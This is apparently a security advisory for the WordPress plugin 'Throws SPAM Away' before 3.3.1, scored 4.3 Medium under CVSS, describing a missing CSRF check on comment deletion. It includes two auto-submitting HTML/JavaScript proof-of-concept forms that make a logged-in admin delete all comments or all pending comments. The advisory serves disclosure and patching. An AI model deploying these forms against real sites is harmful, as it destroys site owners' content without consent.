Daniel RufWPEX-ID:AC290535-D9EC-459A-ABC3-27CD78EB54FCThrows SPAM Away < 3.3.1 - Comment Deletion via CSRF
4.3 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
The plugin does not have CSRF checks in place when deleting comments (either all, spam, or pending), allowing attackers to make a logged in admin delete comments via a CSRF attack
To delete all comments
<form id="test" action="https://example.com/wp-admin/admin.php?page=throws-spam-away%2Fthrows_spam_away_comments.php" method="POST">
<input type="text" name="c_all" value="a">
<input type="text" name="all" value="a">
<input type="text" name="Submit" value="Delete all Comments">
</form>
<script>
document.getElementById("test").submit();
</script>
<form id="test" action="https://example.com/wp-admin/admin.php?page=throws-spam-away%2Fthrows_spam_away_comments.php" method="POST">
<input type="text" name="c_pend" value="p">
<input type="text" name="pend" value="p">
<input type="text" name="Submit" value="Delete all pending Comments">
</form>
<script>
document.getElementById("test").submit();
</script>Related
4.3 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N